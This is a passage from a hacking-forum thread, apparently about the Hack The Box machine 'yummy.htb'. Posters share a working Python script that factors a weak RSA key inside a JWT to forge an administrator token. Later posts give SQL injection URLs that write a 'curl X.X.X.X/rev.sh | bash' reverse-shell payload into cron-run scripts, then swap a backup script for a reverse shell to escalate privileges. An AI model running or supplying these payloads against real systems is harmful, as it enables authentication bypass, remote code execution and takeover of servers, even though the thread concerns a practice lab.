Posts: 221
Threads: 16
Joined: Aug 2023
Well this time may work but dont use port scanners directly.
You can easily be dedected.
Use ip pool address to check for ports
Posts: 10
Threads: 0
Joined: Aug 2024
(Oct 05, 2024, 09:41 PM)Pepperwhite Wrote: (Oct 05, 2024, 09:36 PM)sedlyf Wrote: put your token and you can access /admindashboard
import base64
import json
import jwt
from Crypto.PublicKey import RSA
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
import sympy
token = "<X-Auth-here"
js = json.loads(base64.b64decode(token.split(".")[1]).decode())
n= int(js["jwk"]['n'])
p,q= list((sympy.factorint(n)).keys())
e=65537
phi_n = (p-1)*(q-1)
d = pow(e, -1, phi_n)
key_data = {'n': n, 'e': e, 'd': d, 'p': p, 'q': q}
key = RSA.construct((key_data['n'], key_data['e'], key_data['d'], key_data['p'], key_data['q']))
private_key_bytes = key.export_key()
private_key = serialization.load_pem_private_key(
private_key_bytes,
password=None,
backend=default_backend()
)
public_key = private_key.public_key()
data = jwt.decode(token, public_key, algorithms=["RS256"] )
data["role"] = "administrator"
new_token = jwt.encode(data, private_key, algorithm="RS256")
print(new_token)
Doesn't look like it's working for me, getting logged out. But thanks anyways, I'll keep going on this track.
Try placing the generated JWT in X-AUTH-Token and session
Posts: 6
Threads: 0
Joined: Aug 2024
(Oct 05, 2024, 09:36 PM)sedlyf Wrote: put your token and you can access /admindashboard
import base64
import json
import jwt
from Crypto.PublicKey import RSA
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
import sympy
token = "X-Token"
def add_padding(b64_str):
while len(b64_str) % 4 != 0:
b64_str += '='
return b64_str
def base64url_decode(input):
input = add_padding(input)
input = input.replace('-', '+').replace('_', '/')
return base64.b64decode(input)
# Decode the payload
js = json.loads(base64url_decode(token.split(".")[1]).decode())
n = int(js["jwk"]['n'])
p, q = list((sympy.factorint(n)).keys())
e = 65537
phi_n = (p - 1) * (q - 1)
d = pow(e, -1, phi_n)
key_data = {'n': n, 'e': e, 'd': d, 'p': p, 'q': q}
key = RSA.construct((key_data['n'], key_data['e'], key_data['d'], key_data['p'], key_data['q']))
private_key_bytes = key.export_key()
private_key = serialization.load_pem_private_key(
private_key_bytes,
password=None,
backend=default_backend()
)
public_key = private_key.public_key()
data = jwt.decode(token, public_key, algorithms=["RS256"])
data["role"] = "administrator"
new_token = jwt.encode(data, private_key, algorithm="RS256")
print(new_token)
The script doesn't work for me. I'm getting incorrect padding errors when I'm trying to X-auth token in it.
Posts: 19
Threads: 0
Joined: Aug 2024
Oct 05, 2024, 10:14 PM
(This post was last modified: Oct 05, 2024, 10:41 PM by Pepperwhite.)
(Oct 05, 2024, 10:12 PM)Myst Wrote: (Oct 05, 2024, 09:36 PM)sedlyf Wrote: put your token and you can access /admindashboard
import base64
import json
import jwt
from Crypto.PublicKey import RSA
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
import sympy
token = "X-Token"
def add_padding(b64_str):
while len(b64_str) % 4 != 0:
b64_str += '='
return b64_str
def base64url_decode(input):
input = add_padding(input)
input = input.replace('-', '+').replace('_', '/')
return base64.b64decode(input)
# Decode the payload
js = json.loads(base64url_decode(token.split(".")[1]).decode())
n = int(js["jwk"]['n'])
p, q = list((sympy.factorint(n)).keys())
e = 65537
phi_n = (p - 1) * (q - 1)
d = pow(e, -1, phi_n)
key_data = {'n': n, 'e': e, 'd': d, 'p': p, 'q': q}
key = RSA.construct((key_data['n'], key_data['e'], key_data['d'], key_data['p'], key_data['q']))
private_key_bytes = key.export_key()
private_key = serialization.load_pem_private_key(
private_key_bytes,
password=None,
backend=default_backend()
)
public_key = private_key.public_key()
data = jwt.decode(token, public_key, algorithms=["RS256"])
data["role"] = "administrator"
new_token = jwt.encode(data, private_key, algorithm="RS256")
print(new_token)
The script doesn't work for me. I'm getting incorrect padding errors when I'm trying to X-auth token in it.
The JWT you're putting in token probably has "session=" inside too. Remove it with the token following it.
Posts: 19
Threads: 1
Joined: Jun 2024
The db user does have the FILE permission node, so it may be possible to abuse that.
database management system users privileges:
[*]'chef'@'localhost' [1]:
privilege: FILE
Posts: 32
Threads: 1
Joined: Aug 2024
Oct 05, 2024, 11:19 PM
(This post was last modified: Oct 06, 2024, 12:06 AM by olkn00b.)
(Oct 05, 2024, 10:51 PM)ShitWhiffler Wrote: The db user does have the FILE permission node, so it may be possible to abuse that.
database management system users privileges:
[*]'chef'@'localhost' [1]:
privilege: FILE
might be able to write the users out to a txt file since we cant see em with sqlmap
EDIT: tried this cant seem to write anything to /tmp
Posts: 47
Threads: 4
Joined: Nov 2023
Oct 06, 2024, 12:20 AM
(This post was last modified: Oct 06, 2024, 12:49 AM by jahman.)
Hello,
Here is a qick method to have a rev shell wiith mysql priv (admin X-AUTH-Token is required)
PHP Code: http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"ping%3b"+INTO+OUTFILE++'/data/scripts/dbstatus.json'+%3b
http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"curl+X.X.X.X/rev.sh+|bash%3b"+INTO+OUTFILE++'/data/scripts/fixer-v___'+%3b
privsec to www-data
PHP Code: mv /data/scripts/app_backup.sh /data/scripts/app_backup.sh.old
mv "Your_Revshell.sh" /data/scripts/app_backup.sh
privesc to user
PHP Code: string /var/www/app-qatesting/.hg/store/data/app.py.i
Posts: 14
Threads: 2
Joined: Aug 2024
(Oct 06, 2024, 12:20 AM)jahman Wrote: Hello,
Here is a qick method to have a rev shell wiith mysql priv (admin X-AUTH-Token is required)
PHP Code: http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"ping%3b"+INTO+OUTFILE++'/data/scripts/dbstatus.json'+%3b
http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"curl+X.X.X.X/rev.sh+|bash%3b"+INTO+OUTFILE++'/data/scripts/fixer-v___'+%3b
privsec to www-data
PHP Code: mv /data/scripts/app_backup.sh /data/scripts/app_backup.sh.old
mv "Your_Revshell.sh" /data/scripts/app_backup.sh
privesc to user
PHP Code: string /var/www/app-qatesting/.hg/store/data/app.py.i
I got the shell, how to go to www-data is confusing
Posts: 52
Threads: 2
Joined: Apr 2024
(Oct 06, 2024, 12:20 AM)jahman Wrote: Hello,
Here is a qick method to have a rev shell wiith mysql priv (admin X-AUTH-Token is required)
PHP Code: http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"ping%3b"+INTO+OUTFILE++'/data/scripts/dbstatus.json'+%3b
http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"curl+X.X.X.X/rev.sh+|bash%3b"+INTO+OUTFILE++'/data/scripts/fixer-v___'+%3b
privsec to www-data
PHP Code: mv /data/scripts/app_backup.sh /data/scripts/app_backup.sh.old
mv "Your_Revshell.sh" /data/scripts/app_backup.sh
privesc to user
PHP Code: string /var/www/app-qatesting/.hg/store/data/app.py.i
(Oct 06, 2024, 01:36 AM)dogedofedoge Wrote: (Oct 06, 2024, 12:20 AM)jahman Wrote: Hello,
Here is a qick method to have a rev shell wiith mysql priv (admin X-AUTH-Token is required)
PHP Code: http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"ping%3b"+INTO+OUTFILE++'/data/scripts/dbstatus.json'+%3b
http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"curl+X.X.X.X/rev.sh+|bash%3b"+INTO+OUTFILE++'/data/scripts/fixer-v___'+%3b
privsec to www-data
PHP Code: mv /data/scripts/app_backup.sh /data/scripts/app_backup.sh.old
mv "Your_Revshell.sh" /data/scripts/app_backup.sh
privesc to user
PHP Code: string /var/www/app-qatesting/.hg/store/data/app.py.i
I got the shell, how to go to www-data is confusing
CD to /data/scripts
upload another shell
Do the mv commands to rename the file thats there to .old and then rename your shell to the file you .old
wait for new shell to pickup....
Posts: 37
Threads: 2
Joined: Jan 2024
(Oct 06, 2024, 12:20 AM)jahman Wrote: Hello,
Here is a qick method to have a rev shell wiith mysql priv (admin X-AUTH-Token is required)
PHP Code: http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"ping%3b"+INTO+OUTFILE++'/data/scripts/dbstatus.json'+%3b
http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"curl+X.X.X.X/rev.sh+|bash%3b"+INTO+OUTFILE++'/data/scripts/fixer-v___'+%3b
privsec to www-data
PHP Code: mv /data/scripts/app_backup.sh /data/scripts/app_backup.sh.old
mv "Your_Revshell.sh" /data/scripts/app_backup.sh
privesc to user
PHP Code: string /var/www/app-qatesting/.hg/store/data/app.py.i
Did you got root yet ?
user qa can run sudo -l :
User qa may run the following commands on localhost:
(dev : dev) /usr/bin/hg pull /home/dev/app-production/
but i dont know how to work with this
|
